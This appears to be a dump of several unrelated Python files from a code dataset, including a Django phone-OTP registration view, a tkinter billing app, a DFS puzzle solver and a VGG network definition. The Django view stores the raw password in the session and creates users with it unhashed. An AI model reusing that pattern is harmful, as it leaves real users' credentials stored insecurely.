host_uo,port_uo,service_uo)\n logger.debug(parametri_con)\n con = cx_Oracle.connect(parametri_con)\n logger.info(\"Versione ORACLE: {}\".format(con.version))\n \n \n # PRIMA VERIFICO SE CI SIANO DIFFERENZE CHE GIUSTIFICHINO IMPORTAZIONE\n curr1 = conn.cursor()\n sel_sit='''select vt.num_seq, id_via::int, coalesce(vt.numero_civico, ' ') as numero_civico , \n coalesce(riferimento,' ') as riferimento, fo.freq_binaria as frequenza,vt.tipo_elemento, vt.id_elemento::int,\n coalesce(vt.nota_asta, ' ') as nota_asta\n from etl.v_tappe vt \n join etl.frequenze_ok fo on fo.cod_frequenza = vt.frequenza_asta::int \n where id_percorso = %s \n order by num_seq , numero_civico, id_elemento, nota_asta '''\n try:\n curr1.execute(sel_sit, (id_p,))\n #logger.debug(query_sit1, max_id_macro_tappa, vv[4] )\n #curr1.rowfactory = makeDictFactory(curr1)\n tappe_sit=curr1.fetchall()\n except Exception as e:\n logger.error(sel_sit, id_p )\n logger.error(e)\n \n \n cur1 = con.cursor()\n sel_uo='''SELECT VTP.CRONOLOGIA NUM_SEQ,VTP.ID_VIA, NVL(VTP.NUM_CIVICO,' ') as NUMERO_CIVICO,\n NVL(VTP.RIFERIMENTO, ' ') as RIFERIMENTO,\n VTP.FREQELEM,VTP.TIPO_ELEMENTO, TO_NUMBER(VTP.ID_ELEMENTO) AS ID_ELEM_INT,\n NVL(VTP.NOTA_VIA, '') as NOTA_VIA\n FROM V_TAPPE_ELEMENTI_PERCORSI VTP\n inner join (select MAX(CPVT.DATA_PREVISTA) data_prevista, CPVT.ID_PERCORSO\n from CONS_PERCORSI_VIE_TAPPE CPVT\n where CPVT.DATA_PREVISTA<=TO_DATE(:t1,'DD/MM/YYYY') \n group by CPVT.ID_PERCORSO) PVT\n on PVT.ID_PERCORSO=VTP.ID_PERCORSO \n and vtp.data_prevista = pvt.data_prevista\n where VTP.ID_PERCORSO=:t2\n ORDER BY VTP.CRONOLOGIA,NUMERO_CIVICO,ID_ELEM_INT, NOTA_VIA\n ''' \n try:\n cur1.execute(sel_uo, (oggi1, cod_p))\n #cur1.rowfactory = makeDictFactory(cur1)\n tappe_uo=cur1.fetchall()\n except Exception as e:\n logger.error(sel_uo, oggi1, cod_p)\n logger.error(e)\n \n curr1.close() \n cur1.close() \n logger.debug('Trovate {} tappe su SIT per il percorso {}'.format(len(tappe_sit),cod_p))\n logger.debug('Trovate {} tappe su UO per il percorso {}'.format(len(tappe_uo),cod_p))\n \n logger.debug(tappe_sit[1][1])\n logger.debug(tappe_uo[1][1])\n\n \n \n \n if cfr_tappe(tappe_sit, tappe_uo, logger)==0 :\n logger.info('Percorso {} già importato con data antecedente. Non ci sono state modifiche sostanziali.'.format(cod_p))\n else: \n logger.info('Percorso {} già importato con data antecedente ma da reimportare (ci sono cose che non tornano).'.format(cod_p))\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n # CHIUDO LE CONNESSIONI \n logger.info(\"Chiudo definitivamente le connesioni al DB\")\n con.close()\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"amiugete/script_sit_amiu","sub_path":"test_tappe.py","file_name":"test_tappe.py","file_ext":"py","file_size_in_byte":7971,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26546086160","text":"##########################################################################\n# This file is part of ssm.\n#\n# ssm is free software: you can redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# ssm is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU\n# General Public License for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with ssm. If not, see\n# .\n#########################################################################\n\nimport os\nimport os.path\nimport tarfile\nimport shutil\nimport json\n\nfrom Ccoder import Ccoder\nfrom Data import Data\n\nfrom jinja2 import Environment, FileSystemLoader\n\nclass Builder(Data, Ccoder):\n \"\"\"build a model\"\"\"\n\n def __init__(self, path_rendered, dpkgRoot, dpkg, **kwargs):\n Ccoder.__init__(self, dpkgRoot, dpkg, **kwargs)\n Data.__init__(self, path_rendered, dpkgRoot, dpkg, **kwargs)\n\n self.path_rendered = os.path.abspath(unicode(path_rendered, 'utf8'))\n self.env = Environment(loader=FileSystemLoader(os.path.join(self.path_rendered, 'C', 'templates')))\n self.env.filters.update({\n 'is_prior': lambda x: ('require' in x) and ('fields' not in x['require']) and ('data' in x) and ('distribution' in x['data'])\n })\n\n def prepare(self, path_templates=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'C', 'templates'), replace=True):\n \"\"\"\n copy templates to path_rendered\n \"\"\"\n\n ##this function is called only when a new user has created or edited a model whose name is unique (primary key) so it is the only one able to recreate a model...\n if replace:\n if os.path.exists(self.path_rendered):\n shutil.rmtree(self.path_rendered)\n\n #copy templates to uploads/rendered/user_name/model_id\n if not os.path.exists(self.path_rendered):\n shutil.copytree(path_templates, os.path.join(self.path_rendered, 'C', 'templates'))\n\n def archive(self, replace=True):\n \"\"\"make a tarball\"\"\"\n\n tar = tarfile.open(os.path.join(os.path.dirname(self.path_rendered), os.path.basename(self.path_rendered)+'.tar.gz'), \"w:gz\")\n tar.add(self.path_rendered, arcname=os.path.basename(self.path_rendered))\n tar.close()\n\n if replace:\n if os.path.exists(self.path_rendered):\n shutil.rmtree(self.path_rendered)\n\n def render(self, prefix, data):\n\n template = self.env.get_template(prefix + '_template.c')\n with open(os.path.join(self.path_rendered, 'C', 'templates', prefix + \".c\"), \"w\") as f:\n f.write(template.render(data))\n os.remove(os.path.join(self.path_rendered, 'C', 'templates', prefix + '_template.c'))\n\n def code(self):\n \"\"\"generate C code for MIF, Simplex, pMCMC, Kalman, simulation, ...\"\"\"\n\n is_diff = True if len(self.par_diff) > 0 else False\n\n orders = self.orders()\n\n ##methods whose results are use multiple times\n step_ode_sde = self.step_ode_sde()\n jac = self.jac(step_ode_sde['sf'])\n\n self.render('ode_sde', {'is_diff': is_diff, 'step':step_ode_sde, 'orders': orders})\n\n parameters = self.parameters()\n parameters['orders'] = orders\n self.render('transform', parameters)\n self.render('input', parameters)\n\n observed = self.observed()\n observed['orders'] = orders\n observed['h_grads'] = self.h_grads()\n self.render('observed', observed)\n\n self.render('iterator', {'iterators':self.iterators()})\n\n psr = {\n 'orders': orders,\n 'alloc': self.alloc_psr(),\n 'is_diff': is_diff,\n 'white_noise': self.white_noise,\n 'step': self.step_psr(),\n 'step_inc': self.step_psr_inc(),\n 'psr_multinomial': self.step_psr_multinomial()\n }\n self.render('psr', psr)\n\n self.render('diff', {'diff': self.compute_diff(), 'orders': orders})\n\n self.render('Q', {'Q': self.eval_Q(), 'is_diff': is_diff, 'orders': orders})\n\n self.render('Ht', {'Ht': self.Ht(), 'is_diff': is_diff, 'orders': orders})\n\n 
self.render('jac', {'jac': jac, 'is_diff': is_diff, 'orders': orders})\n\n self.render('step_ekf', {'is_diff': is_diff, 'step': step_ode_sde, 'orders': orders})\n\n self.render('check_IC', parameters)\n\n def write_data(self):\n\n reset_all = []\n for x in self.obs_model:\n reset_all += [self.order_states[s] for s in self.get_inc_reset(x)]\n\n x = {'start': self.t0.isoformat(), 'data': self.prepare_data(), 'covariates': self.prepare_covariates(), 'reset_all': list(set(reset_all))}\n with open(os.path.join(self.path_rendered, \".data.json\"), \"w\") as f:\n json.dump(x, f)\n\n\n\nif __name__==\"__main__\":\n\n\n dpkgRoot = os.path.join('..' ,'examples', 'foo')\n dpkg = json.load(open(os.path.join(dpkgRoot, 'package.json')))\n b = Builder(os.path.join(dpkgRoot, 'bin'), dpkgRoot, dpkg)\n\n b.prepare()\n b.code()\n b.write_data()\n","repo_name":"StateSpaceModels/ssm","sub_path":"src/Builder.py","file_name":"Builder.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"54"} +{"seq_id":"24111770660","text":"from tkinter import *\nfrom tkinter import ttk\n \ndef pay():\n totall = float(tot.cget(\"text\"))\n pay = float(e11.get())\n bal = pay - totall\n balText.set(bal)\n \n \n \ndef selection():\n selection = radio.get()\n selection1 = radio1.get()\n qty = int(e1.get())\n if(selection==1):\n if(selection1 ==1):\n item = \"Roll\"\n inge = \"veg\"\n price = 50\n tot = int(price * qty)\n tempList = [[item + \" \" + inge , price, qty, tot]]\n tempList.sort(key=lambda e: e[1], reverse=True)\n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n elif (selection1 == 2):\n item = \"Roll\"\n inge = \"chicken\"\n price = 100\n tot = int(price * qty)\n tempList = [[item + \" \" + inge, price, qty, tot]]\n tempList.sort(key=lambda e: e[1], reverse=True)\n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n elif (selection1 == 3):\n item = \"Roll\"\n inge = \"Fish\"\n price = 80\n tot = int(price * qty)\n tempList = [[item + \" \" + inge, price, qty, tot]]\n tempList.sort(key=lambda e: e[1], reverse=True)\n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n \n elif (selection == 2):\n \n if (selection1 == 1):\n \n item = \"Pasty\"\n \n inge = \"veg\"\n \n price = 80\n \n tot = int(price * qty)\n \n tempList = [[item + \" \" + inge, price, qty, tot]]\n \n tempList.sort(key=lambda e: e[1], reverse=True)\n \n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n \n elif (selection1 == 2):\n \n item = \"Pasty\"\n \n inge = \"chicken\"\n \n price = 90\n \n tot = int(price * qty)\n \n tempList = [[item + \" \" + inge, price, qty, tot]]\n \n tempList.sort(key=lambda e: e[1], reverse=True)\n \n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n \n elif (selection1 == 3):\n \n item = \"Pasty\"\n \n inge = \"Fish\"\n \n price = 120\n \n tot = int(price * qty)\n \n tempList = [[item + \" \" + inge, price, qty, tot]]\n \n tempList.sort(key=lambda e: e[1], reverse=True)\n \n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n elif (selection == 3):\n \n if 
(selection1 == 1):\n \n item = \"Bun\"\n \n inge = \"veg\"\n \n price = 60\n \n tot = int(price * qty)\n \n tempList = [[item + \" \" + inge, price, qty, tot]]\n \n tempList.sort(key=lambda e: e[1], reverse=True)\n \n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n \n elif (selection1 == 2):\n \n item = \"Bun\"\n \n inge = \"chicken\"\n \n price = 70\n \n tot = int(price * qty)\n \n tempList = [[item + \" \" + inge, price, qty, tot]]\n \n tempList.sort(key=lambda e: e[1], reverse=True)\n \n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n \n elif (selection1 == 3):\n \n item = \"Bun\"\n \n inge = \"Fish\"\n \n price = 40\n \n tot = int(price * qty)\n \n tempList = [[item + \" \" + inge, price, qty, tot]]\n \n tempList.sort(key=lambda e: e[1], reverse=True)\n \n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n sum1 = 0.0\n for child in listBox.get_children():\n sum1 += float(listBox.item(child, 'values')[3])\n totText.set(sum1)\n \n \n \n \n \ntop = Tk()\ntop.geometry(\"800x500\")\ntop.title(\"Restaurant Inventory System Python par Berenger\")\n \nradio = IntVar()\nradio1 = IntVar()\nglobal totText\nglobal balText\ntotText = StringVar()\nbalText = IntVar()\nR1 = Radiobutton(top, text=\"Roll\", variable=radio, value=1)\nR1.pack(anchor=W)\nR1.place(x=10,y=10)\n \nR2 = Radiobutton(top, text=\"Pasty\", variable=radio, value=2)\nR2.pack(anchor=W)\nR2.place(x=10,y=40)\n \nR3 = Radiobutton(top, text=\"Bun\", variable=radio, value=3)\nR3.pack(anchor=W)\nR3.place(x=10,y=70)\n \n \n \nR4 = Radiobutton(top, text=\"Veg\", variable=radio1, value=1)\nR4.pack(anchor=W)\nR4.place(x=80,y=10)\n \nR2 = Radiobutton(top, text=\"Chicken\", variable=radio1, value=2)\nR2.pack(anchor=W)\nR2.place(x=80,y=40)\n \nR3 = Radiobutton(top, text=\"Fish\", variable=radio1, value=3)\nR3.pack(anchor=W)\nR3.place(x=80,y=70)\n \ne1 = Entry(top)\ne1.place(x=80, y=100)\nLabel(top, text=\"Qty\").place(x=10, y=100)\n \ntot = Label(top, text=\"\",font=\"arial 22 bold\", textvariable=totText)\ntot.place(x=450, y=10)\n \nButton(top, text=\"Add\",command = selection,height=3, width= 13).place(x=80, y=130)\n \n \n \ne11 = Entry(top)\ne11.place(x=450, y=50)\n \ne12 = Entry(top)\n \nbalance = Label(top, text=\"\",font=\"arial 22 bold\", textvariable=balText).place(x=450, y=80)\nButton(top, text=\"PayNow\",command = pay,height=3, width= 13).place(x=650, y=120)\n \n \ncols = ('item', 'price', 'qty','total')\nlistBox = ttk.Treeview(top, columns=cols, show='headings')\n \nfor col in cols:\n listBox.heading(col, text=col)\n listBox.grid(row=1, column=0, columnspan=2)\n listBox.place(x=10, y=220)\n \ntop.mainloop()\n","repo_name":"berengerbenam/Python","sub_path":"systeme_inventaire_de_restaurant.py","file_name":"systeme_inventaire_de_restaurant.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32153138243","text":"#!/usr/bin/env python \n\nimport argparse\nimport matplotlib.pyplot as plt\nimport data_decoder\n\ndef main(): \n parser = argparse.ArgumentParser(description=\"Create a plots from a rover log. 
Each plot will be \\\n saved as an individual file in the local directory.\")\n parser.add_argument(\"filepath\")\n parser.add_argument('-a','--all',action='store_true',help=\"Create all available plots. Default if no options are given.\")\n parser.add_argument('--sonar_plot',action='store_true',help=\"Create a plot of sonar data.\")\n parser.add_argument('--steering_plot',action='store_true',help=\"Create a plot of commanded steering data.\")\n\n args = parser.parse_args()\n\n # if no specific output option is request then all ouput options will be completed\n if not (args.all or args.sonar_plot or args.steering_plot):\n args.all = True\n\n # Create a plot for sonar data\n if args.all == True or args.sonar_plot:\n sonar_1 = []\n sonar_2 = []\n sonar_3 = []\n sonar_4 = []\n sonar_5 = []\n with open(args.filepath) as fp:\n cnt5 = 0\n x_sonar=[]\n for line in fp:\n msg_str, msg = data_decoder.read_log_dataline(line)\n if msg_str.split('Stamped')[-1] == 'Sonar':\n cnt5 +=1\n x_sonar.append(cnt5)\n sonar_1.append(msg.ping1) \n sonar_2.append(msg.ping2) \n sonar_3.append(msg.ping3) \n sonar_4.append(msg.ping4) \n sonar_5.append(msg.ping5) \n\n plt.clf()\n plt.plot(x_sonar, sonar_1, label=\"far left\")\n plt.plot(x_sonar, sonar_2, label=\"mid left\")\n plt.plot(x_sonar, sonar_3, label=\"front\")\n plt.plot(x_sonar, sonar_4, label=\"mid right\")\n plt.plot(x_sonar, sonar_5, label=\"far right\")\n plt.xlim(-5, cnt5 + 20)\n plt.legend()\n plt.savefig(\"sonar_plot.png\")\n\n # Create a plot for commanded steering data\n if args.all == True or args.steering_plot:\n steering = []\n with open(args.filepath) as fp:\n cnt6 = 0\n x_steer=[]\n for line in fp:\n msg_str, msg = data_decoder.read_log_dataline(line)\n if msg_str.split('Stamped')[-1] == 'Control':\n cnt6 +=1\n x_steer.append(cnt6)\n steering.append(msg.steering) \n\n plt.clf()\n plt.plot(x_steer, steering)\n plt.savefig(\"steering_plot.png\")\n \nif __name__ == '__main__':\n main()\n","repo_name":"MINDS-i/MINDS-i-Debugger","sub_path":"scripts/make_plots.py","file_name":"make_plots.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"44000691787","text":"from django.shortcuts import render, redirect\nfrom django.views import View\nfrom django.contrib import messages\nfrom utils import send_otp_code\nfrom .models import OtpCode, User\nfrom random import randint\n\nfrom .forms import UserRegistrationForm, VerifyCodeForm\n\n\nclass UserRegisterView(View):\n form_class = UserRegistrationForm\n templates_class = \"accounts/register.html\"\n\n def get(self, request):\n form = self.form_class\n return render(request, self.templates_class, {'form': form})\n\n def post(self, request):\n form = self.form_class(request.POST)\n\n if form.is_valid():\n cd = form.cleaned_data\n random_code = randint(1000, 9999)\n #when we connect to api service recomment this code\n #send_otp_code(cd['phone'], random_code)\n OtpCode.objects.create(phone_number=cd['phone'], code=random_code)\n request.session['user_registration_info'] = {\n 'phone_number': cd['phone'],\n 'email': cd['email'],\n 'full_name': cd['full_name'],\n 'password': cd['password'],\n }\n messages.success(request, 'we send message to you', 'success')\n return redirect(\"accounts:verify_code\")\n return render(request, self.templates_class, {'form': form})\n\n\nclass UserRegisterVerifyCodeView(View):\n class_form = VerifyCodeForm\n\n def get(self, request):\n form = self.class_form\n return render(request, 
'accounts/verify.html', {'form': form})\n\n def post(self, request):\n user_session = request.session['user_registration_info']\n code_instance = OtpCode.objects.get(phone_number=user_session['phone_number'])\n\n form = self.class_form(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n if cd['code'] == code_instance.code:\n User.objects.create(phone_number=user_session['phone_number']\n , email=user_session['email']\n , full_name=user_session['full_name']\n , password=user_session['password'])\n code_instance.delete()\n messages.success(request, \"you registered successfully\", 'success')\n return redirect(\"home:home\")\n else:\n messages.error(request, 'code was incorrect', 'danger')\n return redirect('accounts:verify_code')\n else:\n messages.error(request, 'form got error', 'danger')\n return redirect(\"home:home\")\n","repo_name":"mrkingali/shop","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74365205920","text":"# Academicos:\n# - Ana Gabrielly Mendes Pedroso\n# - Davidson Denis Ferreira Guimaraes\n# - Larissa Fraga Pinto\n\ndef formata_saida(no):\n return '[' + str(no.get_canibais()) + ',' + str(no.get_missionarios()) + ',' + str(no.get_bote()) + ']'\n\n\ndef compara_nos(no1, no2):\n comparacao = False\n if no1.get_canibais() == no2.get_canibais() \\\n and no1.get_missionarios() == no2.get_missionarios() \\\n and no1.get_bote() == no2.get_bote():\n comparacao = True\n\n return comparacao\n\n\nclass No:\n\n def __init__(self, qtdCanibais, qtdMissionarios, qtdBoteMargemEsquerda):\n self.qtdCanibais = qtdCanibais\n self.qtdMissionarios = qtdMissionarios\n self.qtdBoteMargemEsquerda = qtdBoteMargemEsquerda\n self.listaNosPais = []\n self.listaNosFilhos = []\n self.solucao_e_ordem_de_visita = []\n\n def get_canibais(self):\n return self.qtdCanibais\n\n def get_missionarios(self):\n return self.qtdMissionarios\n\n def get_bote(self):\n return self.qtdBoteMargemEsquerda\n\n def get_lista_pais(self):\n return self.listaNosPais\n\n def get_lista_filhos(self):\n return self.listaNosFilhos\n\n def verifica_validade(self):\n verificacao = False\n\n if 0 <= self.get_canibais() <= 3 and 0 <= self.get_missionarios() <= 3 \\\n and (self.get_missionarios() == 0\n or self.get_missionarios() == 3\n or self.get_missionarios() == self.get_canibais()):\n\n verificacao = True\n\n return verificacao\n\n def adiciona_pai(self, novopai):\n if self.pai_nao_eh_filho(novopai):\n self.listaNosPais.append(novopai)\n\n def adiciona_filho(self, novofilho):\n if self.filho_nao_eh_pai(novofilho):\n self.listaNosFilhos.append(novofilho)\n\n def pai_nao_eh_filho(self, pai):\n verificacao = True\n for no in self.get_lista_filhos():\n if compara_nos(no, pai):\n verificacao = False\n return verificacao\n\n def filho_nao_eh_pai(self, novofilho):\n verificacao = True\n for no in self.get_lista_pais():\n if compara_nos(no, novofilho):\n verificacao = False\n return verificacao\n\n def set_solucao_ordem_de_visita(self,id_solucao_ordem_da_visita, ordem_de_visita):\n aux = [id_solucao_ordem_da_visita,ordem_de_visita]\n self.solucao_e_ordem_de_visita.append(aux)\n\n def get_solucao_ordem_visita(self):\n return self.solucao_e_ordem_de_visita\n\nclass Grafo:\n\n def __init__(self, noInicial,noFinal, movimentosPossiveis):\n self.noInicial = noInicial\n self.noFinal = noFinal\n self.movimentosPossiveis = movimentosPossiveis\n self.nos_grafo = []\n 
self.nos_grafo.append(noInicial)\n\n def get_lista_nos_grafo(self):\n return self.nos_grafo\n\n def gerar_grafo(self):\n for no in self.nos_grafo:\n self.gerar_nos_filhos(no)\n\n print('Estados do grafo gerado')\n for no in self.nos_grafo:\n print(formata_saida(no) + ' Filhos: '+' '.join([str(formata_saida(v)) for v in no.get_lista_filhos()]) + '\\n\\t\\tPais: '+' '.join([str(formata_saida(v)) for v in no.get_lista_pais()]))\n print('='*30)\n\n def gerar_nos_filhos(self, no_pai):\n if not compara_nos(no_pai, self.noFinal):\n for movimento in self.movimentosPossiveis:\n canibais = 0\n missionarios = 0\n bote = -1\n no_filho = None\n\n if no_pai.get_bote() == 1:\n canibais = no_pai.get_canibais() - movimento.get_canibais_no_barco()\n missionarios = no_pai.get_missionarios() - movimento.get_missionarios_no_barco()\n bote = 0\n\n else:\n canibais = no_pai.get_canibais() + movimento.get_canibais_no_barco()\n missionarios = no_pai.get_missionarios() + movimento.get_missionarios_no_barco()\n bote = 1\n\n if 0 <= canibais <= 3 and 0 <= missionarios <= 3:\n no_filho = No(canibais, missionarios, bote)\n if not compara_nos(no_filho, self.noInicial):\n if no_filho.verifica_validade():\n self.geracao_final(no_filho, no_pai)\n\n def geracao_final(self, no_recem_criado, novo_pai):\n no_ja_foi_criado = False\n for no_grafo in self.nos_grafo:\n for no_filho_grafo in no_grafo.get_lista_filhos():\n if compara_nos(no_recem_criado, no_filho_grafo):\n no_ja_foi_criado = True\n no_filho_grafo.adiciona_pai(novo_pai)\n novo_pai.adiciona_filho(no_filho_grafo)\n break\n if no_ja_foi_criado:\n break\n\n if not no_ja_foi_criado:\n no_recem_criado.adiciona_pai(novo_pai)\n novo_pai.adiciona_filho(no_recem_criado)\n self.nos_grafo.append(no_recem_criado)\n\n\nclass DFS:\n\n def __init__(self, grafo, estadoInicial, estadoFinal):\n self.fronteira = []\n self.nos_visitados = []\n self.estadoInicial = estadoInicial\n self.estadoFinal = estadoFinal\n self.grafo = grafo\n self.solucao_atual = 1\n self.ordem_de_visita = 1\n self.fronteira.append(estadoInicial)\n\n def printa_nos_visitados(self):\n ordem = 1\n for no in self.nos_visitados:\n for solucao in no.get_solucao_ordem_visita():\n if self.solucao_atual == solucao[0] and ordem == solucao[1]:\n print(formata_saida(no))\n ordem += 1\n\n def printa_fronteira(self):\n for no in self.fronteira:\n print(formata_saida(no))\n\n def busca_em_profundidade(self):\n if len(self.fronteira) > 0:\n no = self.fronteira.pop()\n\n print(\"\\nNó que será visitado:\")\n print(formata_saida(no))\n print(\"\\nFronteira antes da visita:\")\n self.printa_fronteira()\n self.nos_visitados.append(no)\n no.set_solucao_ordem_de_visita(self.solucao_atual, self.ordem_de_visita)\n self.ordem_de_visita += 1\n self.coloca_filhos_na_fronteira(no)\n print(\"\\nFronteira depois da visita:\")\n self.printa_fronteira()\n print('-' * 30)\n\n if compara_nos(no, self.estadoFinal):\n self.formata_saida_solucao_encontrada(no)\n\n self.busca_em_profundidade()\n\n def coloca_filhos_na_fronteira(self, no):\n for no_filho in no.get_lista_filhos():\n self.fronteira.append(no_filho)\n\n def formata_saida_solucao_encontrada(self, no_disparo):\n print('#' * 30)\n print(str(self.solucao_atual) +'ª SOLUÇÃO ENCONTRADA: ')\n self.printa_nos_visitados()\n self.solucao_atual += 1\n self.adiciona_solucao_atual_a_todos_nos_visitados(no_disparo)\n self.ordem_de_visita = 1\n print('#' * 30)\n\n def adiciona_solucao_atual_a_todos_nos_visitados(self, no_disparo):\n for no in self.nos_visitados:\n primeira_solucao_no = 
no.get_solucao_ordem_visita()[0]\n irmaos = self.get_irmaos_estao_na_fronteira(no)\n irmao_disparou_solucao = False\n for no_irmao in irmaos:\n if compara_nos(no_disparo,no_irmao):\n irmao_disparou_solucao = True\n break\n\n if len(irmaos) == 0 or not irmao_disparou_solucao:\n no.set_solucao_ordem_de_visita(self.solucao_atual, primeira_solucao_no[1])\n\n def get_irmaos_estao_na_fronteira(self, no):\n irmaos = []\n for pai in no.get_lista_pais():\n for filho_desse_pai in pai.get_lista_filhos():\n if not compara_nos(filho_desse_pai, no) and self.verifica_se_estado_esta_na_fronteira(filho_desse_pai):\n irmaos.append(filho_desse_pai)\n\n return irmaos\n\n def verifica_se_estado_esta_na_fronteira(self,estado_comparacao):\n verificacao = False\n for no in self.fronteira:\n if compara_nos(no, estado_comparacao):\n verificacao = True\n return verificacao\n\n\nclass Movimento:\n\n def __init__(self, qtd_canibais_no_barco, qtd_missionarios_no_barco):\n self.qtd_canibais_no_barco = qtd_canibais_no_barco\n self.qtd_missionarios_no_barco = qtd_missionarios_no_barco\n\n def get_canibais_no_barco(self):\n return self.qtd_canibais_no_barco\n\n def get_missionarios_no_barco(self):\n return self.qtd_missionarios_no_barco","repo_name":"AnaGMendesPedroso/IA-Algoritmos_Busca","sub_path":"src/missionarios/profundidade/profundidade.py","file_name":"profundidade.py","file_ext":"py","file_size_in_byte":8649,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21899382792","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n#from tensorflow.contrib import layers\n#from tensorflow.contrib.framework.python.ops import arg_scope\n#from tensorflow.contrib.layers.python.layers import layers as layers_lib\n#from tensorflow.contrib.layers.python.layers import regularizers\n#from tensorflow.contrib.layers.python.layers import utils\n#from tensorflow.python.ops import array_ops\n#from tensorflow.python.ops import init_ops\n#from tensorflow.python.ops import nn_ops\n#from tensorflow.python.ops import variable_scope\n#import tensorflow.contrib.slim as slim\n\n\n\ndef conv_block(infeat, ntimes, nfeat, prefix):\n ret = infeat \n for ii in range(ntimes):\n vname = prefix+'/'+prefix+'_'+str(ii+1)\n ret = tf.layers.conv2d(ret, nfeat, [3, 3], name=vname, padding='SAME', activation=tf.nn.relu, kernel_regularizer=tf.contrib.layers.l2_regularizer(0.0001),kernel_initializer = tf.contrib.layers.xavier_initializer(uniform=False))\n\n return ret\n\ndef vgg_16(inputs, scope='vgg_16'):\n\n endpoints={}\n #with variable_scope.variable_scope(scope, 'vgg_16', [inputs]) as sc:\n with tf.variable_scope(name_or_scope=scope, values=[inputs], reuse=tf.AUTO_REUSE):\n #net = layers_lib.repeat(inputs, 2, layers.conv2d, 64, [3, 3], scope='conv1')\n net = conv_block(inputs, 2, 64, 'conv1')\n net = tf.layers.max_pooling2d(net, pool_size = [2, 2], strides=[2, 2], padding = 'SAME', name='pool1')\n #net = layers_lib.repeat(net, 2, layers.conv2d, 128, [3, 3], scope='conv2')\n net = conv_block(net, 2, 128, 'conv2')\n net = tf.layers.max_pooling2d(net, pool_size=[2, 2], strides=[2, 2], padding = 'SAME', name ='pool2')\n #net = layers_lib.repeat(net, 3, layers.conv2d, 256, [3, 3], scope='conv3')\n net = conv_block(net, 3, 256, 'conv3')\n net = tf.layers.max_pooling2d(net, pool_size=[2, 2], strides=[2, 2], padding = 'SAME', name='pool3')\n #net = layers_lib.repeat(net, 3, layers.conv2d, 512, [3, 3], 
scope='conv4')\n net = conv_block(net, 3, 512, 'conv4')\n endpoints['conv4_3'] = net\n conv4_3out = net\n net = tf.layers.max_pooling2d(net, pool_size=[2, 2],strides=[2, 2], padding = 'SAME', name='pool4')\n #outputs_pool4 = net\n #net = layers_lib.repeat(net, 3, layers.conv2d, 512, [3, 3], scope='conv5')\n net = conv_block(net, 3, 512, 'conv5')\n\n endpoints['conv5_3'] = net\n # modified layers\n net = tf.layers.max_pooling2d(net,pool_size=[3, 3],strides=[1, 1],padding=\"SAME\",name='pool5') \n #outputs_pool5 = net\n endpoints['pool5'] = net\n\n # dilate 3,3 for pool5 w/ stride 2; dilate 6, for stride 1\n net = tf.layers.conv2d(net, 1024, [3, 3], strides=[1, 1], dilation_rate=[6,6], padding='SAME', name = 'fc6',activation=tf.nn.relu, kernel_regularizer=tf.contrib.layers.l2_regularizer(0.0001),kernel_initializer = tf.contrib.layers.xavier_initializer(uniform=False))\n endpoints['fc6'] = net\n\n net = tf.layers.conv2d(net, 1024, [1, 1], strides=[1, 1], padding='SAME', name = 'fc7',activation=tf.nn.relu, kernel_regularizer=tf.contrib.layers.l2_regularizer(0.0001),kernel_initializer = tf.contrib.layers.xavier_initializer(uniform=False))\n endpoints['fc7'] = net\n fc7out = net\n\n return [conv4_3out, fc7out]\n #return [endpoints['conv4_3'], endpoints['fc7']]\n\n\ndef net(inputs, data_format='channels_last', VGG_PARAMS_FILE= None, is_train=False):\n\n if data_format != \"channels_last\":\n print('only works for channels last now')\n return None\n outputs = vgg_16(inputs)\n return outputs\n\n","repo_name":"paragt/TF-SSD","sub_path":"VGG-SSD/my_vgg3.py","file_name":"my_vgg3.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35860609345","text":"#!/usr/bin/env python\n#coding:utf-8\n\"\"\"\n Author: WUsf --\n Purpose: \n Created: 2015/12/15\n\"\"\"\n\nimport Configs.RootPath as Root\nfrom ConfigParser import ConfigParser\n\nRootPath = 